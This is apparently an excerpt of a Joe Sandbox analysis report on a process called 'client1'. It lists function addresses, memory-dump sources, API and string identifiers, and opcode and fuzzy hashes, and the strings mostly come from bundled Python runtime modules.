                                                    • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                    • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                    • API String ID: 4998090-2855260032
                                                    • Opcode ID: 325d64cfb385d23493eb0389c0ea059c6d59262dbafda5a72abe8264351e6c2a
                                                    • Instruction ID: 5091bb93fd22be243f411a30a0651f203524a3d1e1ac6d27fc3a0dfc45faf5d1
                                                    • Opcode Fuzzy Hash: 325d64cfb385d23493eb0389c0ea059c6d59262dbafda5a72abe8264351e6c2a
                                                    • Instruction Fuzzy Hash: 6941333161C7C282E660BF75E8446E9B366FB847A4F840231EA6E876D5DF7CD444CB11
                                                    Function 00007FFBAA7324D0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Module_$Dealloc$ObjectObject_$Capsule_ConstantFromMallocMem_SpecStringTrackTypeType_
                                                    • String ID: 14.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                    • API String ID: 288921926-1430584071
                                                    • Opcode ID: 34ac006824e125b38f87d2d071ae01d9c336cf72669efd439cdbfbf994d14880
                                                    • Instruction ID: ebf8cf4169c7ba7191605c94e996a6522488dd2cb9f0f0c96e46391f52a59161
                                                    • Opcode Fuzzy Hash: 34ac006824e125b38f87d2d071ae01d9c336cf72669efd439cdbfbf994d14880
                                                    • Instruction Fuzzy Hash: 09212CE1F0F703C5FA576F35E81417A22ACAF59B90B4A51F4DE1E06694DE2CE9068370
                                                    Function 00007FFBAA6F5F50 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: __acrt_iob_func$FreeMem_abortfputc
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$sub_size_t(): overflow: check the context
                                                    • API String ID: 1022196523-3533778181
                                                    • Opcode ID: 713d784ae3a83d11bb089b661ef9a5180dbe69352fb1f5020284205daa2a53dc
                                                    • Instruction ID: 23d7d0f01ad5040523459ac0ba29f26cc018edbdd22928d424a37448bc172023
                                                    • Opcode Fuzzy Hash: 713d784ae3a83d11bb089b661ef9a5180dbe69352fb1f5020284205daa2a53dc
                                                    • Instruction Fuzzy Hash: 8FD1F4A671AAC5C1DA118F25E8043AEA7A9FB45FD4F505139EE5E07B98DF3CD00ACB10
                                                    Function 00007FFBAA731090 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                    • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                    • API String ID: 1723213316-3528878251
                                                    • Opcode ID: c1d1483b359176232031dcda17eceefdd4cd98cc21702f49892afc3e67e82068
                                                    • Instruction ID: af4114e61f3ef657fcc55b71313d3877c3ec003943eb8c266566d90e366ea733
                                                    • Opcode Fuzzy Hash: c1d1483b359176232031dcda17eceefdd4cd98cc21702f49892afc3e67e82068
                                                    • Instruction Fuzzy Hash: BA515CE1B0E252C5FE66AF36E8146BB5358AB41BC4F1650B1DE5E47B81CE6DE4038730
                                                    Function 00007FFBAB496910 Relevance: 18.1, APIs: 12, Instructions: 90threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: 61ecb8ec4c46b4e4f4ecd4b2a13dbf42c93996b23c02d945c2fc6fa1b127df7b
                                                    • Instruction ID: 1005aeda6381ab8bb9db2ae95004e7ecf71a8ca8cdfb4fb30f9a5561881e5087
                                                    • Opcode Fuzzy Hash: 61ecb8ec4c46b4e4f4ecd4b2a13dbf42c93996b23c02d945c2fc6fa1b127df7b
                                                    • Instruction Fuzzy Hash: 5441B5B2A0AA4281F75A8F39D99833C66A4AF55B78F198334CE7A016F4CF7DD4858340
                                                    Function 00007FFBAA6F6720 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$Free$Err_Malloc$HashMemoryPointerStringmemmove
                                                    • String ID: Cannot hash a signaling NaN value$dec_hash: internal error: please report
                                                    • API String ID: 1495275932-4146688941
                                                    • Opcode ID: 9cd366ce8fd8d8fd14b5555d2db204c7b314a9157a77afb81d300cd1b69b7d69
                                                    • Instruction ID: 0032b98332a343e77d6af286a462337750181997de613f6c749e515e1823977b
                                                    • Opcode Fuzzy Hash: 9cd366ce8fd8d8fd14b5555d2db204c7b314a9157a77afb81d300cd1b69b7d69
                                                    • Instruction Fuzzy Hash: 868184A6E0AB82C5E7128F78D8002ED67A8EB45B68F001275DE9D167D5DF3CD10AC760
                                                    Function 00007FFBAB4960D0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$DivideNumber_SubtypeTrueType_
                                                    • String ID: __init__$charset_normalizer.md.SuspiciousRange$float$ratio
                                                    • API String ID: 2782116801-2445630910
                                                    • Opcode ID: 39bcd692bf62b8ccf14792af55592120cc0fe07b66120c3091a3aed187f41179
                                                    • Instruction ID: 53cb9f83177879f6fe3a9c750c2ebdeff5653530d0c7da3e14f2b9ed19d0e214
                                                    • Opcode Fuzzy Hash: 39bcd692bf62b8ccf14792af55592120cc0fe07b66120c3091a3aed187f41179
                                                    • Instruction Fuzzy Hash: 04516AA2A0BA5681FA169B36E88427D63A1EF44BD4F088235DE3D077F5DF2CE4518340
                                                    Function 00007FFBAA701D94 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatKeywordsParseSubtypeTupleType_
                                                    • String ID: OO|O
                                                    • API String ID: 3104664702-4229707633
                                                    • Opcode ID: 0cba03fe7f2ceab621f130fc5033cb01ca08e311b7ab0defd7ba7ba9bc906242
                                                    • Instruction ID: 6301a3ee833c56ab894053c370bc4801e96738f3d0f5e5703c0333896ba90679
                                                    • Opcode Fuzzy Hash: 0cba03fe7f2ceab621f130fc5033cb01ca08e311b7ab0defd7ba7ba9bc906242
                                                    • Instruction Fuzzy Hash: 03511BB2E1AA12D5EB128F71D8404BE37B8BB45B98B4404B2DE4D23A94DF3DE547C760
                                                    Function 00007FFBAA700FA0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: O|OO$internal error in dec_mpd_qquantize$optional argument must be a context
                                                    • API String ID: 3219279049-2753496222
                                                    • Opcode ID: 3415ee9708b1d50977dc94845924ca4995d6baaadcc99fc1e813adf81667f348
                                                    • Instruction ID: 26c3a6c392c89e0df1006d6d764b39f91ae2f8897acae99f3d38f91a0d990c5e
                                                    • Opcode Fuzzy Hash: 3415ee9708b1d50977dc94845924ca4995d6baaadcc99fc1e813adf81667f348
                                                    • Instruction Fuzzy Hash: 57616FB2A0AA42E5EB168F71D8401FE37A8EB54B88F4040B2DE4D53764DF3DE646C360
                                                    Function 00007FF79F622030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction ID: 1fb5cea2d22745308a5aad75a2ecaaeb968f502ae9f829d35afa07a1d340ab56
                                                    • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction Fuzzy Hash: 2D5106266187E186E634AF32A4581FAF7A2F798B65F004121EFDE83684DF3CD045DB20
                                                    Function 00007FFBAA734600 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_Unicode_$ArgumentCheckDigitErr_PositionalReadyString
                                                    • String ID: a unicode character$argument 1$digit$not a digit
                                                    • API String ID: 3305933226-4278345224
                                                    • Opcode ID: f3312c4d2492d42c6bf8c5b24e15dccd6aa38fe551f57dd252bb694573ee7750
                                                    • Instruction ID: b20fe5eff156fbe2fee40ebc968d3767c6d1c94d8df14538aedae09aaf6c8af9
                                                    • Opcode Fuzzy Hash: f3312c4d2492d42c6bf8c5b24e15dccd6aa38fe551f57dd252bb694573ee7750
                                                    • Instruction Fuzzy Hash: 08218CB1B0AA53D2EB16AF32D85417A2368BF44B89F4645B5CE0E46264DF2DE457C330
                                                    Function 00007FFBAB4A29B0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    • Opcode ID: 30123b31d54eba71cecac4d279342515692546ad710b5d5dc74d29f4614bb669
                                                    • Instruction ID: ec64c0bf32b8e81bb9d94830b523f86dca5cfa8dfda7c264d2e05600fafe0711
                                                    • Opcode Fuzzy Hash: 30123b31d54eba71cecac4d279342515692546ad710b5d5dc74d29f4614bb669
                                                    • Instruction Fuzzy Hash: 26819CE1E0E60746FA629B37E8412B96290BF45B80F54C03DEE2D477F6EE3CE545A600
                                                    Function 00007FFBAA732730 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                    • Instruction ID: b56236f85bf7ec83d5341aca54663dfa9ba4c76fcaf2bae711415843475032d1
                                                    • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                    • Instruction Fuzzy Hash: 3081ACE1F0E643C6F662BF35D4412BB2298AF65B80F5680B4DE5D43296DE2CE8438270
                                                    Function 00007FFBAA7102BC Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 349153199-0
                                                    • Opcode ID: 8fdea0d8443a6b9b330cb3d9146a51b2e9accca18b067a2d28c1da896e43d931
                                                    • Instruction ID: 6df94a2f7a867c9482bea5c048d1fd4eb3c3d5c7d48a472f0e8386e6b215be2c
                                                    • Opcode Fuzzy Hash: 8fdea0d8443a6b9b330cb3d9146a51b2e9accca18b067a2d28c1da896e43d931
                                                    • Instruction Fuzzy Hash: 25817CA0E8A243C6FAD2AF75D4412BB2AE8AF45784F4440B7DD4C432B6DE2DE5478620
                                                    Function 00007FFBAA6F6AEC Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 366COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 0ce1461ff97c1f48a618c09c0e633b192046d2d262033628e20b7d6151c51586
                                                    • Instruction ID: 1dbfd1259a43a40488a3e2995844c24201f04f04e87522dddb70d2d837d60334
                                                    • Opcode Fuzzy Hash: 0ce1461ff97c1f48a618c09c0e633b192046d2d262033628e20b7d6151c51586
                                                    • Instruction Fuzzy Hash: 5B02A4A2A1ABC2C5E7128F34D8006FD6BA8FB85B48F405166EE8D17A59DF3CD54AC710
                                                    Function 00007FFBAA6FE060 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_Object_String
                                                    • String ID: argument must be an integer$internal error in flags_as_exception
                                                    • API String ID: 2350702593-646087525
                                                    • Opcode ID: b1ebc4cfc559732fde4e5c874c2879e41a62093b1e3c617a2f1e9a70dde39ee1
                                                    • Instruction ID: b751286602e9c444929020d0c5586087394fc80424edc13e6a268449cc79e1c6
                                                    • Opcode Fuzzy Hash: b1ebc4cfc559732fde4e5c874c2879e41a62093b1e3c617a2f1e9a70dde39ee1
                                                    • Instruction Fuzzy Hash: 01B19FB2A0A742C5EF66CF29D8503BE3AA9EB41B40F500472DE4E46794DF7CD48AC761
                                                    Function 00007FFBAA6F5898 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
